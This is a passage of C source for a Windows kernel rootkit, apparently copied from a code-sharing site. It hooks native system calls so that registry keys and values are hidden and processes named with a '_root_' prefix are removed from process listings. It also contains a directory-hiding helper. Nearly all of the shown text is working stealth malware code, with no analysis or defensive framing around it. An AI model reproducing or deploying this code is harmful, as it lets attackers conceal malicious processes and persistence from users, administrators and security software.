📄 rk_ioman.c
字号:
#if 1
if( aProcessName )
{
/* if the process name starts w/ "_root_"
. we will not filter the request ;-) */
if(!strncmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected safe process %s!\n", aProcessName);
safe = TRUE;
}
}
if(!safe)
{
__try
{
int new_index = GetRegValueMapping( hKey, Index );
if(-1 != new_index) Index = new_index;
DbgPrint("rootkit: adjusted index for call %d\n", Index);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
DbgPrint("rootkit: exception while RegValueMapping()\n");
}
}
#endif
rc=((ZWENUMERATEVALUEKEY)(OldZwEnumerateValueKey)) (
hKey,
Index,
KeyValueInfoClass,
KeyValueInfoBuffer,
KeyValueInfoBufferLength,
BytesCopied);
DbgPrint("rootkit: ZwEnumerateValueKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
NTSTATUS NewZwEnumerateKey(
HANDLE hKey,
ULONG Index,
KEY_INFORMATION_CLASS KeyInfoClass,
PVOID KeyInfoBuffer,
ULONG KeyInfoBufferLength,
PULONG BytesCopied
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
BOOL safe = FALSE;
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwEnumerateKey() from %s\n", aProcessName);
#if 1
if( aProcessName )
{
/* if the process name starts w/ "_root_"
. we will not filter the request ;-) */
if(!strncmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected safe process %s!\n", aProcessName);
safe = TRUE;
}
}
if(!safe)
{
__try
{
int new_index = GetRegSubkeyMapping( hKey, Index );
if(-1 != new_index) Index = new_index;
DbgPrint("rootkit: adjusted subkey index for call %d\n", Index);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
DbgPrint("rootkit: exception while RegSubkeyMapping()\n");
}
}
#endif
rc=((ZWENUMERATEKEY)(OldZwEnumerateKey)) (
hKey,
Index,
KeyInfoClass,
KeyInfoBuffer,
KeyInfoBufferLength,
BytesCopied);
DbgPrint("rootkit: ZwEnumerateKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
NTSTATUS NewZwDeleteKey(
HANDLE hKey
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwDeleteKey() from %s\n", aProcessName);
rc=((ZWDELETEKEY)(OldZwDeleteKey)) (
hKey
);
DbgPrint("rootkit: ZwDeleteKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
NTSTATUS NewZwFlushKey(
HANDLE hKey
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwFlushKey() from %s\n", aProcessName);
rc=((ZWFLUSHKEY)(OldZwFlushKey)) (
hKey
);
DbgPrint("rootkit: ZwFlushKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
NTSTATUS NewZwSetValueKey(
HANDLE hKey,
PUNICODE_STRING uValueName,
ULONG TitleIndex,
ULONG ValueType,
PVOID pValueData,
ULONG pValueDataLength
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwSetValueKey() from %s\n", aProcessName);
rc=((ZWSETVALUEKEY)(OldZwSetValueKey)) (
hKey,
uValueName,
TitleIndex,
ValueType,
pValueData,
pValueDataLength
);
DbgPrint("rootkit: ZwSetValueKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
NTSTATUS NewZwCreateKey(
PHANDLE phKey,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG pDisposition
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwCreateKey() from %s\n", aProcessName);
DumpObjectAttributes(ObjectAttributes);
rc=((ZWCREATEKEY)(OldZwCreateKey)) (
phKey,
DesiredAccess,
ObjectAttributes,
TitleIndex,
Class,
CreateOptions,
pDisposition );
DbgPrint("rootkit: ZwCreateKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
NTSTATUS NewZwDeleteValueKey(
HANDLE hKey,
PUNICODE_STRING pValueName
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwDeleteValueKey() from %s\n", aProcessName);
rc=((ZWDELETEVALUEKEY)(OldZwDeleteValueKey)) (
hKey,
pValueName);
DbgPrint("rootkit: ZwDeleteValueKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
. FROM J.K.'s work, directory hiding technique, not used for now since we
. aren't trying to hide just a driver file...
. ______________________________________________________________________________ */
BOOL IsHidingDir( HANDLE hFile )
{
PFILE_OBJECT pfo;
BOOL bIsHiding;
ObReferenceObjectByHandle( hFile,
FILE_READ_DATA,
NULL,
0,
(void **)&pfo,
NULL );
bIsHiding = ( pfo->DeviceObject == pdevRoot );
if( bIsHiding )
{
BYTE bWinSysDir =
(BYTE) RtlEqualUnicodeString( &g_suWinSysDir,
&pfo->FileName,
FALSE );
if( bWinSysDir == 0 )
bWinSysDir = (BYTE) RtlEqualUnicodeString( &g_suDriversDir,
&pfo->FileName,
FALSE );
bIsHiding = bWinSysDir != 0;
}
ObDereferenceObject( pfo );
return bIsHiding;
}
void _stdcall GetFileFullPath( PFILE_OBJECT pfo,
WCHAR **ppsw,
PULONG pdwSize )
{
PFILE_OBJECT pfoRelated = pfo->RelatedFileObject;
if( pfoRelated != NULL )
{
GetFileFullPath( pfoRelated, ppsw, pdwSize );
*(*ppsw)++ = 0x5c;
}
if( (*pdwSize) >= pfo->FileName.Length )
{
RtlCopyMemory( *ppsw, pfo->FileName.Buffer, pfo->FileName.Length );
*ppsw += (pfo->FileName.Length/2);
(*pdwSize) -= pfo->FileName.Length;
}
**ppsw = 0;
}
/* ______________________________________________________________________________
. SystemInformation - this is a big SHIM point, hide processes & threads, etc
. ______________________________________________________________________________ */
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwQuerySystemInformation() from %s\n", aProcessName);
rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
if( NT_SUCCESS( rc ) )
{
// double check the process name, if it starts w/ '_root_' DO NOT
// apply any stealth
if(0 == memcmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected system query from _root_ process\n");
}
else if( g_hide_proc && (5 == SystemInformationClass))
{
// this is a process list, look for process names that start with
// '_root_'
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
//struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta);
ANSI_STRING process_name;
RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE);
if( (0 < process_name.Length) && (255 > process_name.Length) )
{
if(0 == memcmp( process_name.Buffer, "_root_", 6))
{
//////////////////////////////////////////////
// we have a winner!
//////////////////////////////////////////////
char _output[255];
char _pname[255];
memset(_pname, NULL, 255);
memcpy(_pname, process_name.Buffer, process_name.Length);
sprintf( _output,
"rootkit: hiding process, pid: %d\tname: %s\r\n",
curr->ProcessId,
_pname);
DbgPrint(_output);
if(prev)
{
if(curr->NextEntryDelta)
{
// make prev skip this entry
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
// we are last, so make prev the end
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
// we are first in the list, so move it forward
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
// we are the only process!
SystemInformation = NULL;
}
}
}
}
RtlFreeAnsiString(&process_name);
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
return(rc);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -